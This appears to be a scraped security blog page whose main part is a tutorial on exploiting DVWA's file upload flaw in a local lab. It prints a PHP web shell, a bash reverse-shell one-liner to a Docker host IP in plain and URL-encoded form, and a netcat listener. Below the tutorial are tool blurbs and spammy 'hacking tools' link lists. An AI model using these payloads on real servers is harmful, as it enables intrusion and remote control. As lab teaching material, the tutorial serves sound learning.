Monday, April 20, 2020

Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. File Upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to a server. The result of which is that a potential adversary uploads a malicious file to the server and finds his/her way to gain access to the server or perform other malicious activities. The consequences of Unrestricted File Upload are put out by OWASP as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on File Upload navigation link, you'll be presented with a file upload form like this:
Lets upload a simple text file to see what happens. I'll create a simple text file with the following command:
echo TESTUPLOAD > test.txt
and now upload it.
The server gives a response back that our file was uploaded successfully and it also gives us the path where our file was stored on the server. Now lets try to access our uploaded file on the server, we go to the address provided by the server which is something like this:
http://localhost:9000/hackable/uploads/test.txt
and we see the text we had written to the file. Lets upload a php file now since the server is using php. We will upload a simple php file containing phpinfo() function. The contents of the file should look something like this.
<?php
phpinfo();
?>
Save the above code in a file called info.php (you can use any name) and upload it. Now naviagte to the provided URL:
http://localhost:9000/hackable/uploads/info.php
and you should see a phpinfo page like this:
phpinfo page contains a lot of information about the web application, but what we are interested in right now in the page is the disable_functions column which gives us info about the disabled functions. We cannot use disabled functions in our php code. The function that we are interested in using is the system() function of php and luckily it is not present in the disable_functions column. So lets go ahead and write a simple php web shell:
<?php
system($_GET["cmd"]);
?>
save the above code in a file shell.php and upload it. Visit the uploaded file and you see nothing. Our simple php shell is looking for a "cmd" GET parameter which it passes then to the system() function which executes it. Lets check the user using the whoami command as follows:
http://localhost:9000/hackable/uploads/shell.php?cmd=whoami
we see a response from the server giving us the user under which the web application is running.
We can use other bash commands such as ls to list the directories. Lets try to get a reverse shell now, we can use our existing webshell to get a reverse shell or we can upload a php reverse shell. Since we already have webshell at our disposal lets try this method first.
Lets get a one liner bash reverseshell from Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but we first need to know our ip address. Enter following command in a terminal to get your ip address:
ifconfig docker0
the above command provides us information about our virtual docker0 network interface. After getting the ip information we will modify the bash one liner as:
bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1'
here 172.17.0.1 is my docker0 interface ip and 9999 is the port on which I'll be listening for a reverse shell. Before entering it in our URL we need to urlencode it since it has some special characters in it. After urlencoding our reverse shell one liner online, it should look like this:
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27
Now start a listener on host with this command:
nc -lvnp 9999
and then enter the url encoded reverse shell in the cmd parameter of the url like this:
http://localhost:9000/hackable/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27
looking back at the listener we have a reverse shell.
Now lets get a reverse shell by uploading a php reverse shell. We will use pentest monkey php reverse shell which you can get here. Edit the ip and port values of the php reverse shell to 172.17.0.1 and 9999. Setup our netcat listener like this:
nc -lvnp 9999
and upload the reverse shell to the server and access it to execute our reverse shell.
That's it for today have fun.

References:

  1. Unrestricted File Upload: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
  2. Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  3. Php Reverse Shell (Pentest Monkey): https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

More information


ShodanEye: Collect Infomation About All Devices Connected To The Internet With Shodan


About ShodanEye
   This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview.

   Here you can read the latest article about Shodan Eye: Shodan Eye Ethical Hacking Tool Release

   The types of devices that are indexed can vary enormously: from small desktops, refrigerators to nuclear power plants and everything in between. You can find everything using "your own" specified keywords. Examples can be found in a file that is attached:

   The information obtained with this tool can be applied in many areas, a small example:
  • Network security, keep an eye on all devices in your company or at home that are confronted with internet.
  • Vulnerabilities. And so much more.
   For additional data gathering, you can enter a Shodan API key when prompted. A Shodan API key can be found here

Shodan Eye Ethical Hacking Tool Release
   Before we start the year 2020, today there is a new big release ..! Please note, if you have already installed Shodan Eye on your computer, then it is worthwhile to read it carefully. Of course, even if you don't know this Shodan tool yet:
  • Shodan Eye goes from Python 2 to Python 3
  • Save the output of the Shodan Eye results
  • The entry of the Shodan password is no longer visible.

About Shodan Search Engine
   Shoan is a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client.

   What is the difference between Google or another search engine: The most fundamental difference is that Shodan Eye crawls on the internet, Google on the World Wide Web. However, the devices that support the World Wide Web are only a small part of what is actually connected to the Internet.

Before use this tool, you should note that:
  • This was written for educational purpose and pentest only.
  • The author will not be responsible for any damage ..!
  • The author of this tool is not responsible for any misuse of the information.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Performing any hacks without written permission is illegal..!

ShodanEye's screenshots:

ShodanEye Installation
   If you're using GNU/Linux, open your terminal and enter these commands:

   If you're a Windows user, follow these steps to install ShodanEye:
  • Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
  • Download shodan-eye-master.zip file.>
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install shodan
    python shodan-eye.py

Video Shodan Eye on YouTube:

Contact to the author:


Related word


What Is Cybersecurity And Thier types?Which Skills Required To Become A Top Cybersecurity Expert ?

What is cyber security in hacking?

The term cyber security  refers to the technologies  and processes designed  to  defend computer system, software, networks & user data from unauthorized access, also from threats distributed through the internet by cybercriminals,terrorist groups of hacker.

Main types of cybersecurity are
Critical infrastructure security
Application security
Network Security 
Cloud Security 
Internet of things security.
These are the main types of cybersecurity used by cybersecurity expert to any organisation for safe and protect thier data from hack by a hacker.

Top Skills Required to become Cybersecurity Expert-

Problem Solving Skills
Communication Skill
Technical Strength & Aptitude
Desire to learn
Attention to Detail 
Knowledge of security across various platforms
Knowledge of Hacking
Fundamental Computer Forensic Skill.
These skills are essential for become a cybersecurity expert. 
Cyber cell and IT cell these are the department  in our india which provide cybersecurity and looks into the matters related to cyber crimes to stop the crime because in this digitilization world cyber crime increasing day by day so our government of india also takes the immediate action to prevent the cybercrimes with the help of these departments and also arrest the victim and file a complain against him/her with the help of cyberlaw in our constitution.


More info


  1. Best Hacking Tools 2019
  2. Hack Tools Pc
  3. Hacking Tools Kit
  4. Pentest Tools Github
  5. Hacking Tools Windows
  6. Hack Tools
  7. Hacking Tools 2020
  8. Hacker Tools Free
  9. Best Hacking Tools 2019
  10. Pentest Tools Find Subdomains
  11. Hacking Tools
  12. Hacker Tools 2020
  13. Hacker Tools For Mac
  14. Physical Pentest Tools
  15. Hacker Tool Kit
  16. Hacker Tools For Ios
  17. Pentest Tools Free
  18. Hacking Tools 2019
  19. Hacker Tools Apk
  20. Hack Tools Pc
  21. How To Install Pentest Tools In Ubuntu
  22. Hack Tools Download
  23. Hack Tools Pc
  24. Hacking Tools 2020
  25. Ethical Hacker Tools
  26. Hacking Tools For Mac
  27. Hack Tools

Sherlock Tool | Find Usernames Across Social Networks

Read more


  1. Pentest Tools Github
  2. Nsa Hack Tools Download
  3. Hacking Tools For Windows
  4. Hacks And Tools
  5. Hacking Tools For Windows
  6. Pentest Tools Tcp Port Scanner
  7. Pentest Tools Windows
  8. Tools Used For Hacking
  9. Hacking Tools Online
  10. Termux Hacking Tools 2019
  11. Kik Hack Tools
  12. Pentest Tools Website Vulnerability
  13. World No 1 Hacker Software
  14. Hacker Tools Online
  15. Hack Website Online Tool
  16. Hacking Tools Usb
  17. Best Pentesting Tools 2018
  18. Hacker Tools For Ios

Thursday, April 16, 2020

John The Ripper


"A powerful, flexible, and fast multi-platform password hash cracker John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here or here. " read more...

Website: http://www.openwall.com/john

Related links

Classic Lishi Tools page:1